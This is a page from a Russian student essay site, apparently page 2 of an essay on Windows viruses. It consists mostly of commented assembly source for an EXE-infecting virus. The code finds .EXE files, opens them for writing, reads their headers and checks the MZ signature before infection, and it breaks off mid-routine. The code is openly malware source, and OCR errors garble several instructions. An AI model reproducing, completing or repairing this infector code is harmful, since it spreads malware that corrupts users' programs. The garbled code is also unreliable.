Вирусы под Windows
| Категория реферата: Рефераты по информатике, программированию
| Теги реферата: возраст реферат, доклад по обществознанию
| Добавил(а) на сайт: Jandukin.
Предыдущая страница реферата | 1 2 3 4 5 6 7 8 9 10 11 | Следующая страница реферата
хог ch,ch
int 31h
;3агрузим селектор в регистр DS. После этого регистр DS будет
оказывать на выделенный блок памяти
mov ds.bx
.Читаем из стека и сохраняем в памяти
;индекс полученного блока памяти
pop [mem_hnd+2]
pop [mem_hnd]
Получим текущую DTA
mov ah,2Fh
int 21 h
mov [DTA],bx
mov [DTA+2],es
;Найдем первый ЕХЕ-файл (маска *.ЕХЕ)
mov ah,4Eh
xor ex,ex
mov dx,OFFSET wild_exe
push ds
push cs
pop ds
int 21 h
pop ds
;Если файл найден, перейдем к заражению, иначе освободим
;выделенную область памяти и запустим программу-носитель
jnc found_exe
;0свободим выделенную область памяти
call free
.Запустим программу-носитель
jmp exit
.Перейдем к следующему файлу - этот не подходит
close_exe:
; Закроем файл
mov ah,3Eh
int 21h
;Найдем следующий файл
mov ah,4Fh
int 21h
;Если файл найден, перейдем к заражению, иначе освободим
-.выделенную область памяти и запустим программу-носитель
jnc found_exe
;0свободим выделенную область памяти
call free
;3апустим программу-носитель
jmp exit
;Файл найден, проверим его на пригодность к заражению
found ехе:
;0ткроем файл для чтения и записи
push ds
Ids dx, DWORD PTR [DTA]
add dx.lEh
mov ax,3D02h
int 21 h
pop ds
.Прочтем старый заголовок
mov dx.OFFSET old_hdr
mov bx.ax
mov cx,40h
mov ah,3Fh
int 21h
;Проверим сигнатуру, это ЕХЕ-файл?
cmp WORD PTR [old_hdr],"ZM"
jne close_exe
[Проверим смещение таблицы настройки адресов.
;Если значение больше 40h, то это не обычный ЕХЕ-файл.
Рекомендуем скачать другие рефераты по теме: оценка курсовой работы, конспект урока по русскому языку.
Категории:
Предыдущая страница реферата | 1 2 3 4 5 6 7 8 9 10 11 | Следующая страница реферата